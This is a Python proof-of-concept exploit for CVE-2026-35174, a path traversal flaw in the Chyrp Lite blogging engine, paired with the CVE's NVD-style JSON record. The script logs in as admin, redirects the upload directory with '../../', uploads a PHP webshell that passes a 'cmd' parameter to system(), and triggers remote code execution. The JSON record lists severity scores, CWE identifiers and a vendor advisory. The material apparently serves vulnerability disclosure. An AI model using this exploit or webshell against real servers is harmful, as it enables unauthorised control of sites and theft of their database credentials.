CVE-2026-35174

import requests # Target configuration target_url = "http://target.com" login_url = f"{target_url}/admin/login" settings_url = f"{target_url}/admin/settings" upload_url = f"{target_url}/admin/upload" session = requests.Session() # Step 1: Authenticate as Admin # Attacker needs valid credentials or a session with 'Change Settings' permission credentials = {'username': 'admin', 'password': 'password'} session.post(login_url, data=credentials) # Step 2: Exploit Path Traversal via Settings # Change the upload path to a sensitive directory using traversal sequences payload = { 'upload_path': '../../' # Moves upload dir to parent (could be root or web root) } session.post(settings_url, data=payload) # Step 3: Upload Malicious File # The application will now save the file in the traversed directory # Overwriting a critical file (e.g., .htaccess, index.php) or creating a webshell webshell_content = '<?php system($_GET["cmd"]); ?>' files = {'file': ('shell.php', webshell_content, 'application/x-php')} upload_response = session.post(upload_url, files=files) if upload_response.status_code == 200: print("[+] File uploaded. Attempting to access webshell...") # Step 4: Trigger Remote Code Execution shell_url = f"{target_url}/shell.php?cmd=whoami" r = session.get(shell_url) print(f"[+] RCE Response: {r.text}") else: print("[-] Exploit failed")

{"cve": {"id": "CVE-2026-35174", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:43.677", "lastModified": "2026-04-14T15:37:14.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chyrp Lite is an ultra-lightweight blogging engine. Prior to 2026.01, a path traversal vulnerability exists in the administration console that allows an administrator or a user with Change Settings permission to change the uploads path to any folder. This vulnerability allows the user to download any file on the server, including config.json.php with database credentials and overwrite critical system files, leading to remote code execution. This vulnerability is fixed in 2026.01."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chyrplite:chyrp_lite:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.01", "matchCriteriaId": "A06975FD-D52C-42B2-8842-7626FCA5A94E"}]}]}], "references": [{"url": "https://github.com/xenocrat/chyrp-lite/security/advisories/GHSA-p6pf-2grm-8257", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}